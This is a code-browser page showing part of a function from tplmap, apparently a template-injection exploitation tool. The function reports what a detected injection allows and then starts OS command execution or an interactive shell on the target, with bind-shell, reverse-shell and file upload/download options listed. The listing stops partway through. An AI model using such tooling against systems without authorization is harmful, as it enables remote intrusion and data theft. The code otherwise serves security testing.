hub / github.com/epinna/tplmap / check_template_injection

Function check_template_injection

core/checks.py:141–314  ·  view source on GitHub ↗
(channel)

Source from the content-addressed store, hash-verified

139 channel.inj_idx += 1
140
141def check_template_injection(channel):
142
143 current_plugin = detect_template_injection(channel)
144
145 # Kill execution if no engine have been found
146 if not channel.data.get('engine'):
147 log.fatal("""Tested parameters appear to be not injectable. Try to increase '--level' value to perform more tests.""")
148 return
149
150 # Print injection summary
151 _print_injection_summary(channel)
152
153 # If actions are not required, prints the advices and exit
154 if not any(
155 f for f,v in channel.args.items() if f in (
156 'os_cmd', 'os_shell', 'upload', 'download', 'tpl_shell', 'tpl_code', 'bind_shell', 'reverse_shell'
157 ) and v
158 ):
159
160 log.info(
161 """Rerun tplmap providing one of the following options:\n%(execute)s%(execute_blind)s%(bind_shell)s%(reverse_shell)s%(write)s%(read)s""" % (
162 {
163 'execute': '\n --os-shell\t\t\t\tRun shell on the target\n --os-cmd\t\t\t\tExecute shell commands' if channel.data.get('execute') and not channel.data.get('execute_blind') else '',
164 'execute_blind': '\n --os-shell\t\t\t\tRun shell on the target\n --os-cmd\t\t\tExecute shell commands' if channel.data.get('execute_blind') else '',
165 'bind_shell': '\n --bind-shell PORT\t\t\tConnect to a shell bind to a target port' if channel.data.get('bind_shell') else '',
166 'reverse_shell': '\n --reverse-shell HOST PORT\tSend a shell back to the attacker\'s port' if channel.data.get('reverse_shell') else '',
167 'write': '\n --upload LOCAL REMOTE\tUpload files to the server' if channel.data.get('write') else '',
168 'read': '\n --download REMOTE LOCAL\tDownload remote files' if channel.data.get('read') else '', }
169 )
170 )
171
172 return
173
174
175 # Execute operating system commands
176 if channel.args.get('os_cmd') or channel.args.get('os_shell'):
177
178 # Check the status of command execution capabilities
179 if channel.data.get('execute_blind'):
180 log.info("""Blind injection has been found and command execution will not produce any output.""")
181 log.info("""Delay is introduced appending '&& sleep <delay>' to the shell commands. True or False is returned whether it returns successfully or not.""")
182
183 if channel.args.get('os_cmd'):
184 print current_plugin.execute_blind(channel.args.get('os_cmd'))
185 elif channel.args.get('os_shell'):
186 log.info('Run commands on the operating system.')
187 Shell(current_plugin.execute_blind, '%s (blind) $ ' % (channel.data.get('os', ''))).cmdloop()
188
189 elif channel.data.get('execute'):
190 if channel.args.get('os_cmd'):
191 print current_plugin.execute(channel.args.get('os_cmd'))
192 elif channel.args.get('os_shell'):
193 log.info('Run commands on the operating system.')
194
195 Shell(current_plugin.execute, '%s $ ' % (channel.data.get('os', ''))).cmdloop()
196
197 else:
198 log.error('No system command execution capabilities have been detected on the target.')

Callers 1

test_detection Method · 0.90

Calls 12

Shell Class · 0.90
MultilineShell Class · 0.90
TcpServer Class · 0.90
_print_injection_summary Function · 0.85
get Method · 0.80
execute_blind Method · 0.80
execute Method · 0.80
read Method · 0.80
write Method · 0.80
bind_shell Method · 0.80
reverse_shell Method · 0.80

Tested by 1

test_detection Method · 0.72